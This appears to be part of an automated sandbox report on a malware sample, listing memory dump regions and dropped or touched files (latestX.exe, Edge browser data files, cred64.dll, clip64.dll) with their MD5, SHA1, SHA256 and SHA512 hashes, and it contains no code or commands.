memory/1268-329-0x0000000073800000-0x0000000073FB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 4259741d18709377356d29591b4dc36e
SHA1 fdeceeff45e86b56378071036df01464d8ef5657
SHA256 26e7a79d3d199e75630889447be52d3abc2b94b9c242b6b798f5c9fb16da6456
SHA512 af142e4964169dfe9ff28dedd3c9d2057430d4edfd8bf47c9e6f968c57f88a06e5d9197ca7751a735a2717af681ec0734a7d975bc11cfc49a5f565a93b2d833a

memory/1268-338-0x0000000004A10000-0x0000000004A20000-memory.dmp

memory/1832-339-0x0000000073800000-0x0000000073FB0000-memory.dmp

memory/444-351-0x0000000002B30000-0x0000000002F32000-memory.dmp

memory/444-354-0x0000000002F40000-0x000000000382B000-memory.dmp

memory/1268-356-0x0000000000400000-0x0000000000430000-memory.dmp

memory/444-359-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f95638730ec51abd55794c140ca826c9
SHA1 77c415e2599fbdfe16530c2ab533fd6b193e82ef
SHA256 106137874d86d602d1f4af7dac605f3470ec7a5d69b644b99d502bb38925bbd3
SHA512 0eb01b446d876886066783242381d214a01e2d282729a69b890ae2b6d74d0e1325a6bd4671738ebe3b6ecadc22ceb00f42348bad18d2352896ed3344cc29f78a

memory/3172-375-0x0000000008AF0000-0x0000000008B06000-memory.dmp

memory/5564-376-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2228-374-0x0000000073800000-0x0000000073FB0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 0f691726acfea8b19deffad38105ac0a
SHA1 1d2a3c43076e271b8466edc8e8bbed8a33812d31
SHA256 318aec95e22ec38c2176d8288d9eae2cf4bda1570222bd5e9234e820742f408c
SHA512 7bb28d25b45201617415322806694f46f8447cf81ec2b161e7bcf0cd8c1dc2f4411982fe5007645c1d15030f4bc17d5fa2cb8f3b7bc26f6fc301d36d1463b4ac

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1b0ea5905143384ec536c35c6a2508c0
SHA1 39107d0cddec96e41eb795da50769dedcc665177
SHA256 dfae1eb7d761a95a71112f0be0b9edf251aca11042aa6e6a0af50cb48dfae196
SHA512 9c0ff0f438b2da02580a5f6a7b51f7e7f77a0b0611f0bc31fc59999ad47890c7ada6e9aa6c407cf69068fb951cc30250fd332e06b4343f68b712c4fbd8f5f120

memory/444-429-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1268-430-0x0000000073800000-0x0000000073FB0000-memory.dmp

memory/5940-431-0x0000000001100000-0x0000000001136000-memory.dmp

memory/5940-432-0x0000000073800000-0x0000000073FB0000-memory.dmp

memory/5940-433-0x0000000004DD0000-0x0000000004DE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ekfg4wet.yrq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5664-452-0x00007FF641520000-0x00007FF641AC1000-memory.dmp

memory/444-481-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/444-555-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5400-580-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/5664-665-0x00007FF641520000-0x00007FF641AC1000-memory.dmp

memory/5400-705-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1160-720-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5384-724-0x00007FF6696D0000-0x00007FF669C71000-memory.dmp